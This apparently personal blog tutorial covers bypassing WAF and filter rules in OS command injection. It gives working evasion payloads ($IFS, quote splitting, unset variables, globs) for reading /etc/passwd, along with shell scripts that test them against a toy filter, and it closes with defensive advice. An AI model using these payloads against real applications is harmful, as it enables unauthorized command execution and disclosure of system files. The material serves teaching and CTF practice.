Remote Code Execution — Bypassing WAF and Filters

Welcome to the series

In this first part of the series I'll talk about bypassing simple rules, using a small PHP script to mimic the vulnerability as it appears in real applications. This class of bug is easy to spot because it is confined to the functions that hand input to the operating system: passthru(), system() and shell_exec() in PHP, or os.system() and subprocess with shell=True in Python. All of them pass the string to /bin/sh -c, so what follows is really about what the shell does to the string after the filter has looked at it. In a real case the script will look much like the one below.

(Image: the PHP script that passes a request parameter into the OS; the first command is highlighted in red and the second in green.)

Bypassing when the space character is forbidden

This is a common case if you're here because of a CTF competition. In bash you can use $IFS in place of a space. IFS stands for Internal Field Separator; by default it holds space, tab and newline, so an unquoted $IFS expands to whitespace that the shell then splits on, which also helps when a newline or another separator is what's being filtered. Write it as ${IFS} when a letter follows, otherwise the shell looks up a variable named IFSfoo. Brace expansion, {command,argument}, also yields two separate words, but it is a bash feature: PHP's system() hands the string to /bin/sh, which on Debian and Ubuntu is dash, and dash leaves the braces alone.

(Image: $IFS in place of a space; {command,var} works fine.)

Bypassing WAF template matching or rules

As I mentioned before, a Web Application Firewall or an input filter works from specific rules, and it will block you right away if you send an exact payload such as "bin/cat" or "etc/passwd". The weakness is that the rule matches the raw request string while the shell parses it afterwards, so any rewrite the shell undoes before execution slips past the rule. There are many ways we can play with this.

Use quotes to wrap part of your payload

You can split the payload with single or double quotes; the shell strips them during quote removal, so c'a't runs as cat and the filter never sees the literal. It works just fine!

(Image: the split payload.)

Use an uninitialized variable

In bash an unset variable expands to an empty string, so c${u}at becomes cat once the shell has parsed it while the literal "cat" never appears in the request, which helps us get past the "template matching". Pick a name that is not set in the target's environment, or the expansion will not be empty.

(Image: payload using an uninitialized variable.)
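The following is an added example and not code from the original post; it serves both the "space is forbidden" section and the template-matching section above. A toy filter applies the naive rules to the raw request string, and each payload that passes is handed to a shell the way PHP's system() hands it to /bin/sh -c. It assumes /bin/sh and bash are installed; the file being read is a constructed sample in a temp dir standing in for /etc/passwd, and the variable and function names are my own.

```shell
# Constructed target: one line that looks like /etc/passwd, in a temp dir.
SAMPLE_DIR=$(mktemp -d)
SAMPLE_FILE="$SAMPLE_DIR/passwd"
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$SAMPLE_FILE"

# Rule 1, the "space is forbidden" case: reject any raw payload with a space.
filter_no_space() {
    case "$1" in *' '*) return 1 ;; esac
    return 0
}

# Rule 2, template matching on literals, on top of rule 1: reject "cat" and
# the exact path of the protected file.
filter_blocklist() {
    filter_no_space "$1" || return 1
    case "$1" in *cat*|*"$SAMPLE_FILE"*) return 1 ;; esac
    return 0
}

# $1 = filter function, $2 = shell (sh or bash), $3 = raw payload.
# Prints BLOCKED if a rule fires, FAILED if the shell could not run the
# payload, otherwise the command's output. The shell gets the string exactly
# as PHP's system() would: "<shell> -c <string>".
try_payload() {
    if "$1" "$3"; then
        "$2" -c "$3" 2>/dev/null || echo "FAILED"
    else
        echo "BLOCKED"
    fi
}

DIR_PART=${SAMPLE_FILE%passwd}   # reused below so the path can be split mid-word

# Space: ${IFS} expands to space/tab/newline and is then word-split, so "cat"
# and the path end up as two words. The braces matter because a letter follows.
PAYLOAD_IFS="cat\${IFS}$SAMPLE_FILE"

# Space: brace expansion. bash only; dash (Debian's /bin/sh) keeps the braces
# literally and reports the command as not found.
PAYLOAD_BRACE="{cat,$SAMPLE_FILE}"

# Literal: quotes are removed when the shell parses the line, so c'a't is the
# word cat and pass'wd' is passwd, while neither literal is in the request.
PAYLOAD_QUOTE="c'a't\${IFS}${DIR_PART}pass'wd'"

# Literal: an empty string contributes nothing to the word.
PAYLOAD_EMPTY="c\"\"at\${IFS}${DIR_PART}pa\"\"sswd"

# Literal: an unset variable expands to nothing. The name u is assumed not to
# be set in the target's environment.
PAYLOAD_UNSET="c\${u}at\${IFS}${DIR_PART}pass\${u}wd"

cleanup() { rm -rf "$SAMPLE_DIR"; }
```

Swap SAMPLE_FILE for /etc/passwd and the same payloads read the real file. Note which shell each one needs: the ${IFS}, quote, empty-string and unset-variable payloads all work under dash and bash, the brace payload only under bash, so the first thing to learn about a target is which shell sits behind /bin/sh.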

Use a glob wildcard

This is the most interesting part: you can replace characters in the command or the path with shell wildcards, ? for exactly one character and * for any run of characters (these are globs, not regular expressions, so a dot is just a literal dot). To craft the payload, keep trying patterns with command -v or ls until the pattern resolves to the command you're after. If the pattern still matches two or more paths, the shell does not run each of them: it expands the pattern into several words in place, the first match becomes the command and the remaining matches become its arguments, which usually breaks the request you're sending through curl. For example, if you're trying to read a file's contents you might need /bin/cat, so start with a pattern for that path and check what it lists.

(Image: the pattern lists every matching path; the wildcard payload works just fine.)

Maximizing bash features to your benefit

There are many more ways to get past template matching, but if you happen to be able to run the which command, you can use it to confirm that a helper binary exists before you build a payload around it, combining it with a wildcard so that the binary's name never appears literally in the request. I'll do two examples: base64 and xxd.

(Images: which confirms the binary exists; a single ? wildcard is used; xxd exists; the payload works.)
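The following is an added example and not code from the original post; it serves both the wildcard section and the which section above. glob_matches shows what a pattern expands to before anything runs, tool_path does the job of which with the POSIX command -v, and two constructed stand-in binaries show what really happens when a pattern matches more than one path. It assumes a POSIX sh, a readable /etc/passwd and /bin/echo; the stand-ins are symlinks in a temp dir and the function names are my own.

```shell
# Print every path the pattern matches, one per line; nothing if none match.
glob_matches() {
    for path in $1; do      # unquoted on purpose: this is the glob expansion
        [ -e "$path" ] && printf '%s\n' "$path"
    done
    return 0
}

# Number of matches. A wildcard payload is only predictable when this is 1.
glob_count() {
    glob_matches "$1" | wc -l | tr -d ' '
}

# Locate a helper before building a payload around it. command -v is POSIX
# and does what which does, and which is not guaranteed to be installed.
tool_path() {
    command -v "$1" 2>/dev/null
}

# Run a wildcard payload the way the target shell does: the pattern expands
# in place, the first match becomes the command, and every other match is
# inserted as an argument ahead of the intended one. $1 = pattern, $2 = argument.
run_glob_payload() {
    sh -c "$1 $2" 2>/dev/null
}

# Constructed stand-ins: two "binaries" whose names differ in one character,
# both symlinked to /bin/echo so they print whatever argv they receive.
FAKE_BIN=$(mktemp -d)
ln -s /bin/echo "$FAKE_BIN/cat"
ln -s /bin/echo "$FAKE_BIN/cut"

cleanup() { rm -rf "$FAKE_BIN"; }
```

With the stand-ins, "$FAKE_BIN/c?t target" runs the cat stand-in with "$FAKE_BIN/cut target" as its arguments, which is exactly the failure mode on a real box: on a system with a merged /usr, /???/c?t can match both /bin/cat and /bin/cut, so cat is asked to dump the cut binary before it gets to your file. Narrow the pattern (/???/ca? here) until glob_count reports 1, and use tool_path before you rely on a helper such as base64 or xxd.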

Lastly

It's almost impossible for a Web Application Firewall to catch payloads that keep evolving like this with "template matching" alone; maybe it's time to move to a machine-learning-based WAF. On the application side, the durable fix is not to hand user input to a shell at all: pass arguments to the program directly, or at the very least wrap each one in escapeshellarg() so the shell never re-parses it.

jeremyah joel

I like the idea of breaking into something.